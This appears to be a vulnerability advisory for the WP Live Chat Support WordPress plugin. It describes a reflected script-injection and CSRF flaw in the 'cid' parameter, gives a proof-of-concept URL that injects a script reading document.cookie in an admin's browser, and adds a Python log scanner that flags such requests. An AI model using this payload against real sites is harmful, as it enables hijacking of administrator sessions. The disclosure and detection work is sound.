https://wordpress.org/plugins/wp-live-chat-support/

Due to a lack of CSRF mitigation and entity encoding in wp-live-chat-support.php, it is possible to execute scripts in the context of an admin user by including a script in the cid field in a GET request.

## CVSS Score

4.8

## CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

## Affected Versions

7.0.06 and below

## Solution

## Proof of Concept

```
http://target/wp-admin/admin.php?page=wplivechat-menu-history&wplc_action=remove_cid&cid=0'><script>alert(document.cookie)<%2Fscript><span class='
```
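For log review, the following added example (not part of the advisory or the plugin's code) flags access-log entries that call the `remove_cid` action with a `cid` that is not a plain integer, and marks those that arrived with a foreign or missing Referer. It assumes the combined log format and that legitimate `cid` values are plain integers; the function names, hosts and sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request target and Referer from a combined-format access log line.
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<target>.+?) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def bad_cid(target):
    """Return the decoded cid when the chat-history remove_cid action is
    requested with a cid that is not a plain integer, otherwise None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    if query.get("page") != ["wplivechat-menu-history"]:
        return None
    if query.get("wplc_action") != ["remove_cid"]:
        return None
    for cid in query.get("cid", []):
        if not re.fullmatch(r"[0-9]+", cid):  # assumption: real ids are integers
            return cid
    return None

def scan(lines, site_host):
    """Return findings; cross_site is True when the Referer is another
    origin or absent, as happens when an admin follows a forged link."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        cid = bad_cid(match["target"])
        if cid is not None:
            referer_host = urlsplit(match["referer"]).hostname
            findings.append({"line": number, "cid": cid,
                             "cross_site": referer_host != site_host})
    return findings

# Constructed sample lines (hosts, addresses and cid values are made up).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2017:10:00:00 +0000] "GET /wp-admin/admin.php?page=wplivechat-menu-history&wplc_action=remove_cid&cid=42 HTTP/1.1" 200 5120 "https://blog.example/wp-admin/admin.php?page=wplivechat-menu-history" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2017:10:05:00 +0000] "GET /wp-admin/admin.php?page=wplivechat-menu-history&wplc_action=remove_cid&cid=0%27%3E%3Cb%3E HTTP/1.1" 200 5240 "https://other.example/page" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2017:10:06:00 +0000] "GET /wp-admin/admin.php?page=other&cid=%3Cb%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE, "blog.example"):
        print(finding)
```

A hit only shows that the request was made; whether the script ran depends on the plugin version that served it.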